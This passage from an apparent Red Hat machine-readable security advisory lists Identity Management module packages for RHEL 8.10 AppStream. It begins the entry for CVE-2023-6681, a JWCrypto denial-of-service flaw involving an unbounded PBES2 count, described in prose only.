"product_reference": "python3-jwcrypto-0:0.5.0-2.module+el8.10.0+21691+df63127d.noarch::idm:DL1",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-jwcrypto-0:0.5.0-2.module+el8.10.0+21692+c9b201bc.noarch (idm:client) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:python3-jwcrypto-0:0.5.0-2.module+el8.10.0+21692+c9b201bc.noarch::idm:client"
},
"product_reference": "python3-jwcrypto-0:0.5.0-2.module+el8.10.0+21692+c9b201bc.noarch::idm:client",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-kdcproxy-0:0.4-5.module+el8.9.0+18911+94941f82.noarch (idm:DL1) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:python3-kdcproxy-0:0.4-5.module+el8.9.0+18911+94941f82.noarch::idm:DL1"
},
"product_reference": "python3-kdcproxy-0:0.4-5.module+el8.9.0+18911+94941f82.noarch::idm:DL1",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-pyusb-0:1.0.0-9.1.module+el8.9.0+18911+94941f82.noarch (idm:DL1) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:python3-pyusb-0:1.0.0-9.1.module+el8.9.0+18911+94941f82.noarch::idm:DL1"
},
"product_reference": "python3-pyusb-0:1.0.0-9.1.module+el8.9.0+18911+94941f82.noarch::idm:DL1",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-pyusb-0:1.0.0-9.1.module+el8.9.0+18920+2223d05e.noarch (idm:client) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:python3-pyusb-0:1.0.0-9.1.module+el8.9.0+18920+2223d05e.noarch::idm:client"
},
"product_reference": "python3-pyusb-0:1.0.0-9.1.module+el8.9.0+18920+2223d05e.noarch::idm:client",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-qrcode-0:5.1-12.module+el8.9.0+18911+94941f82.noarch (idm:DL1) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:python3-qrcode-0:5.1-12.module+el8.9.0+18911+94941f82.noarch::idm:DL1"
},
"product_reference": "python3-qrcode-0:5.1-12.module+el8.9.0+18911+94941f82.noarch::idm:DL1",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-qrcode-0:5.1-12.module+el8.9.0+18920+2223d05e.noarch (idm:client) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:python3-qrcode-0:5.1-12.module+el8.9.0+18920+2223d05e.noarch::idm:client"
},
"product_reference": "python3-qrcode-0:5.1-12.module+el8.9.0+18920+2223d05e.noarch::idm:client",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-qrcode-core-0:5.1-12.module+el8.9.0+18911+94941f82.noarch (idm:DL1) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:python3-qrcode-core-0:5.1-12.module+el8.9.0+18911+94941f82.noarch::idm:DL1"
},
"product_reference": "python3-qrcode-core-0:5.1-12.module+el8.9.0+18911+94941f82.noarch::idm:DL1",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-qrcode-core-0:5.1-12.module+el8.9.0+18920+2223d05e.noarch (idm:client) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:python3-qrcode-core-0:5.1-12.module+el8.9.0+18920+2223d05e.noarch::idm:client"
},
"product_reference": "python3-qrcode-core-0:5.1-12.module+el8.9.0+18920+2223d05e.noarch::idm:client",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-yubico-0:1.3.2-9.1.module+el8.9.0+18911+94941f82.noarch (idm:DL1) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:python3-yubico-0:1.3.2-9.1.module+el8.9.0+18911+94941f82.noarch::idm:DL1"
},
"product_reference": "python3-yubico-0:1.3.2-9.1.module+el8.9.0+18911+94941f82.noarch::idm:DL1",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-yubico-0:1.3.2-9.1.module+el8.9.0+18920+2223d05e.noarch (idm:client) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:python3-yubico-0:1.3.2-9.1.module+el8.9.0+18920+2223d05e.noarch::idm:client"
},
"product_reference": "python3-yubico-0:1.3.2-9.1.module+el8.9.0+18920+2223d05e.noarch::idm:client",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "pyusb-0:1.0.0-9.1.module+el8.9.0+18911+94941f82.src (idm:DL1) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:pyusb-0:1.0.0-9.1.module+el8.9.0+18911+94941f82.src::idm:DL1"
},
"product_reference": "pyusb-0:1.0.0-9.1.module+el8.9.0+18911+94941f82.src::idm:DL1",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "pyusb-0:1.0.0-9.1.module+el8.9.0+18920+2223d05e.src (idm:client) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:pyusb-0:1.0.0-9.1.module+el8.9.0+18920+2223d05e.src::idm:client"
},
"product_reference": "pyusb-0:1.0.0-9.1.module+el8.9.0+18920+2223d05e.src::idm:client",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "slapi-nis-0:0.60.0-4.module+el8.10.0+20723+03062ebd.aarch64 (idm:DL1) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:slapi-nis-0:0.60.0-4.module+el8.10.0+20723+03062ebd.aarch64::idm:DL1"
},
"product_reference": "slapi-nis-0:0.60.0-4.module+el8.10.0+20723+03062ebd.aarch64::idm:DL1",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "slapi-nis-0:0.60.0-4.module+el8.10.0+20723+03062ebd.ppc64le (idm:DL1) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:slapi-nis-0:0.60.0-4.module+el8.10.0+20723+03062ebd.ppc64le::idm:DL1"
},
"product_reference": "slapi-nis-0:0.60.0-4.module+el8.10.0+20723+03062ebd.ppc64le::idm:DL1",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "slapi-nis-0:0.60.0-4.module+el8.10.0+20723+03062ebd.s390x (idm:DL1) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:slapi-nis-0:0.60.0-4.module+el8.10.0+20723+03062ebd.s390x::idm:DL1"
},
"product_reference": "slapi-nis-0:0.60.0-4.module+el8.10.0+20723+03062ebd.s390x::idm:DL1",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "slapi-nis-0:0.60.0-4.module+el8.10.0+20723+03062ebd.src (idm:DL1) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:slapi-nis-0:0.60.0-4.module+el8.10.0+20723+03062ebd.src::idm:DL1"
},
"product_reference": "slapi-nis-0:0.60.0-4.module+el8.10.0+20723+03062ebd.src::idm:DL1",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "slapi-nis-0:0.60.0-4.module+el8.10.0+20723+03062ebd.x86_64 (idm:DL1) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:slapi-nis-0:0.60.0-4.module+el8.10.0+20723+03062ebd.x86_64::idm:DL1"
},
"product_reference": "slapi-nis-0:0.60.0-4.module+el8.10.0+20723+03062ebd.x86_64::idm:DL1",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "slapi-nis-debuginfo-0:0.60.0-4.module+el8.10.0+20723+03062ebd.aarch64 (idm:DL1) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:slapi-nis-debuginfo-0:0.60.0-4.module+el8.10.0+20723+03062ebd.aarch64::idm:DL1"
},
"product_reference": "slapi-nis-debuginfo-0:0.60.0-4.module+el8.10.0+20723+03062ebd.aarch64::idm:DL1",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "slapi-nis-debuginfo-0:0.60.0-4.module+el8.10.0+20723+03062ebd.ppc64le (idm:DL1) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:slapi-nis-debuginfo-0:0.60.0-4.module+el8.10.0+20723+03062ebd.ppc64le::idm:DL1"
},
"product_reference": "slapi-nis-debuginfo-0:0.60.0-4.module+el8.10.0+20723+03062ebd.ppc64le::idm:DL1",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "slapi-nis-debuginfo-0:0.60.0-4.module+el8.10.0+20723+03062ebd.s390x (idm:DL1) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:slapi-nis-debuginfo-0:0.60.0-4.module+el8.10.0+20723+03062ebd.s390x::idm:DL1"
},
"product_reference": "slapi-nis-debuginfo-0:0.60.0-4.module+el8.10.0+20723+03062ebd.s390x::idm:DL1",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "slapi-nis-debuginfo-0:0.60.0-4.module+el8.10.0+20723+03062ebd.x86_64 (idm:DL1) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:slapi-nis-debuginfo-0:0.60.0-4.module+el8.10.0+20723+03062ebd.x86_64::idm:DL1"
},
"product_reference": "slapi-nis-debuginfo-0:0.60.0-4.module+el8.10.0+20723+03062ebd.x86_64::idm:DL1",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "slapi-nis-debugsource-0:0.60.0-4.module+el8.10.0+20723+03062ebd.aarch64 (idm:DL1) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:slapi-nis-debugsource-0:0.60.0-4.module+el8.10.0+20723+03062ebd.aarch64::idm:DL1"
},
"product_reference": "slapi-nis-debugsource-0:0.60.0-4.module+el8.10.0+20723+03062ebd.aarch64::idm:DL1",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "slapi-nis-debugsource-0:0.60.0-4.module+el8.10.0+20723+03062ebd.ppc64le (idm:DL1) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:slapi-nis-debugsource-0:0.60.0-4.module+el8.10.0+20723+03062ebd.ppc64le::idm:DL1"
},
"product_reference": "slapi-nis-debugsource-0:0.60.0-4.module+el8.10.0+20723+03062ebd.ppc64le::idm:DL1",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "slapi-nis-debugsource-0:0.60.0-4.module+el8.10.0+20723+03062ebd.s390x (idm:DL1) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:slapi-nis-debugsource-0:0.60.0-4.module+el8.10.0+20723+03062ebd.s390x::idm:DL1"
},
"product_reference": "slapi-nis-debugsource-0:0.60.0-4.module+el8.10.0+20723+03062ebd.s390x::idm:DL1",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "slapi-nis-debugsource-0:0.60.0-4.module+el8.10.0+20723+03062ebd.x86_64 (idm:DL1) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:slapi-nis-debugsource-0:0.60.0-4.module+el8.10.0+20723+03062ebd.x86_64::idm:DL1"
},
"product_reference": "slapi-nis-debugsource-0:0.60.0-4.module+el8.10.0+20723+03062ebd.x86_64::idm:DL1",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "softhsm-0:2.6.0-5.module+el8.9.0+18911+94941f82.aarch64 (idm:DL1) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:softhsm-0:2.6.0-5.module+el8.9.0+18911+94941f82.aarch64::idm:DL1"
},
"product_reference": "softhsm-0:2.6.0-5.module+el8.9.0+18911+94941f82.aarch64::idm:DL1",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "softhsm-0:2.6.0-5.module+el8.9.0+18911+94941f82.ppc64le (idm:DL1) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:softhsm-0:2.6.0-5.module+el8.9.0+18911+94941f82.ppc64le::idm:DL1"
},
"product_reference": "softhsm-0:2.6.0-5.module+el8.9.0+18911+94941f82.ppc64le::idm:DL1",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "softhsm-0:2.6.0-5.module+el8.9.0+18911+94941f82.s390x (idm:DL1) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:softhsm-0:2.6.0-5.module+el8.9.0+18911+94941f82.s390x::idm:DL1"
},
"product_reference": "softhsm-0:2.6.0-5.module+el8.9.0+18911+94941f82.s390x::idm:DL1",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "softhsm-0:2.6.0-5.module+el8.9.0+18911+94941f82.src (idm:DL1) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:softhsm-0:2.6.0-5.module+el8.9.0+18911+94941f82.src::idm:DL1"
},
"product_reference": "softhsm-0:2.6.0-5.module+el8.9.0+18911+94941f82.src::idm:DL1",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "softhsm-0:2.6.0-5.module+el8.9.0+18911+94941f82.x86_64 (idm:DL1) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:softhsm-0:2.6.0-5.module+el8.9.0+18911+94941f82.x86_64::idm:DL1"
},
"product_reference": "softhsm-0:2.6.0-5.module+el8.9.0+18911+94941f82.x86_64::idm:DL1",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "softhsm-debuginfo-0:2.6.0-5.module+el8.9.0+18911+94941f82.aarch64 (idm:DL1) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:softhsm-debuginfo-0:2.6.0-5.module+el8.9.0+18911+94941f82.aarch64::idm:DL1"
},
"product_reference": "softhsm-debuginfo-0:2.6.0-5.module+el8.9.0+18911+94941f82.aarch64::idm:DL1",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "softhsm-debuginfo-0:2.6.0-5.module+el8.9.0+18911+94941f82.ppc64le (idm:DL1) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:softhsm-debuginfo-0:2.6.0-5.module+el8.9.0+18911+94941f82.ppc64le::idm:DL1"
},
"product_reference": "softhsm-debuginfo-0:2.6.0-5.module+el8.9.0+18911+94941f82.ppc64le::idm:DL1",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "softhsm-debuginfo-0:2.6.0-5.module+el8.9.0+18911+94941f82.s390x (idm:DL1) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:softhsm-debuginfo-0:2.6.0-5.module+el8.9.0+18911+94941f82.s390x::idm:DL1"
},
"product_reference": "softhsm-debuginfo-0:2.6.0-5.module+el8.9.0+18911+94941f82.s390x::idm:DL1",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "softhsm-debuginfo-0:2.6.0-5.module+el8.9.0+18911+94941f82.x86_64 (idm:DL1) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:softhsm-debuginfo-0:2.6.0-5.module+el8.9.0+18911+94941f82.x86_64::idm:DL1"
},
"product_reference": "softhsm-debuginfo-0:2.6.0-5.module+el8.9.0+18911+94941f82.x86_64::idm:DL1",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "softhsm-debugsource-0:2.6.0-5.module+el8.9.0+18911+94941f82.aarch64 (idm:DL1) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:softhsm-debugsource-0:2.6.0-5.module+el8.9.0+18911+94941f82.aarch64::idm:DL1"
},
"product_reference": "softhsm-debugsource-0:2.6.0-5.module+el8.9.0+18911+94941f82.aarch64::idm:DL1",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "softhsm-debugsource-0:2.6.0-5.module+el8.9.0+18911+94941f82.ppc64le (idm:DL1) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:softhsm-debugsource-0:2.6.0-5.module+el8.9.0+18911+94941f82.ppc64le::idm:DL1"
},
"product_reference": "softhsm-debugsource-0:2.6.0-5.module+el8.9.0+18911+94941f82.ppc64le::idm:DL1",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "softhsm-debugsource-0:2.6.0-5.module+el8.9.0+18911+94941f82.s390x (idm:DL1) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:softhsm-debugsource-0:2.6.0-5.module+el8.9.0+18911+94941f82.s390x::idm:DL1"
},
"product_reference": "softhsm-debugsource-0:2.6.0-5.module+el8.9.0+18911+94941f82.s390x::idm:DL1",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "softhsm-debugsource-0:2.6.0-5.module+el8.9.0+18911+94941f82.x86_64 (idm:DL1) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:softhsm-debugsource-0:2.6.0-5.module+el8.9.0+18911+94941f82.x86_64::idm:DL1"
},
"product_reference": "softhsm-debugsource-0:2.6.0-5.module+el8.9.0+18911+94941f82.x86_64::idm:DL1",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "softhsm-devel-0:2.6.0-5.module+el8.9.0+18911+94941f82.aarch64 (idm:DL1) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:softhsm-devel-0:2.6.0-5.module+el8.9.0+18911+94941f82.aarch64::idm:DL1"
},
"product_reference": "softhsm-devel-0:2.6.0-5.module+el8.9.0+18911+94941f82.aarch64::idm:DL1",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "softhsm-devel-0:2.6.0-5.module+el8.9.0+18911+94941f82.ppc64le (idm:DL1) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:softhsm-devel-0:2.6.0-5.module+el8.9.0+18911+94941f82.ppc64le::idm:DL1"
},
"product_reference": "softhsm-devel-0:2.6.0-5.module+el8.9.0+18911+94941f82.ppc64le::idm:DL1",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "softhsm-devel-0:2.6.0-5.module+el8.9.0+18911+94941f82.s390x (idm:DL1) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:softhsm-devel-0:2.6.0-5.module+el8.9.0+18911+94941f82.s390x::idm:DL1"
},
"product_reference": "softhsm-devel-0:2.6.0-5.module+el8.9.0+18911+94941f82.s390x::idm:DL1",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "softhsm-devel-0:2.6.0-5.module+el8.9.0+18911+94941f82.x86_64 (idm:DL1) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:softhsm-devel-0:2.6.0-5.module+el8.9.0+18911+94941f82.x86_64::idm:DL1"
},
"product_reference": "softhsm-devel-0:2.6.0-5.module+el8.9.0+18911+94941f82.x86_64::idm:DL1",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2023-6681",
"cwe": {
"id": "CWE-400",
"name": "Uncontrolled Resource Consumption"
},
"discovery_date": "2024-01-29T00:00:00+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2260843"
}
],
"notes": [
{
"category": "description",
"text": "A vulnerability was found in JWCrypto. This flaw allows an attacker to cause a denial of service (DoS) attack and possible password brute-force and dictionary attacks to be more resource-intensive. This issue can result in a large amount of computational consumption, causing a denial of service attack.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "JWCrypto: denail of service Via specifically crafted JWE",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "The identified vulnerability within the jwcrypto package, presents a moderate severity concern rather than a important one due to several mitigating factors. While the unbounded PBES2 Count value in PBKDF2 algorithms can potentially facilitate a Denial of Service (DoS) attack, its severity is tempered by the fact that successful exploitation requires specific conditions and considerable computational resources. Additionally, applications not reliant on PBKDF2 can easily exclude it from their algorithms list, further reducing exposure.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"AppStream-8.10.0.Z.MAIN.EUS:bind-dyndb-ldap-0:11.6-5.module+el8.10.0+21691+df63127d.aarch64::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:bind-dyndb-ldap-0:11.6-5.module+el8.10.0+21691+df63127d.ppc64le::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:bind-dyndb-ldap-0:11.6-5.module+el8.10.0+21691+df63127d.s390x::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:bind-dyndb-ldap-0:11.6-5.module+el8.10.0+21691+df63127d.src::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:bind-dyndb-ldap-0:11.6-5.module+el8.10.0+21691+df63127d.x86_64::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:bind-dyndb-ldap-debuginfo-0:11.6-5.module+el8.10.0+21691+df63127d.aarch64::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:bind-dyndb-ldap-debuginfo-0:11.6-5.module+el8.10.0+21691+df63127d.ppc64le::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:bind-dyndb-ldap-debuginfo-0:11.6-5.module+el8.10.0+21691+df63127d.s390x::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:bind-dyndb-ldap-debuginfo-0:11.6-5.module+el8.10.0+21691+df63127d.x86_64::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:bind-dyndb-ldap-debugsource-0:11.6-5.module+el8.10.0+21691+df63127d.aarch64::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:bind-dyndb-ldap-debugsource-0:11.6-5.module+el8.10.0+21691+df63127d.ppc64le::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:bind-dyndb-ldap-debugsource-0:11.6-5.module+el8.10.0+21691+df63127d.s390x::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:bind-dyndb-ldap-debugsource-0:11.6-5.module+el8.10.0+21691+df63127d.x86_64::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:custodia-0:0.6.0-3.module+el8.9.0+18911+94941f82.noarch::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:custodia-0:0.6.0-3.module+el8.9.0+18911+94941f82.src::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-0:4.9.13-9.module+el8.10.0+21691+df63127d.src::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.src::idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64::idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le::idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x::idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64::idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-common-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-common-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch::idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-debuginfo-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64::idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-debuginfo-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le::idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-debuginfo-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x::idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-debuginfo-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64::idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-epn-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64::idm:DL1",
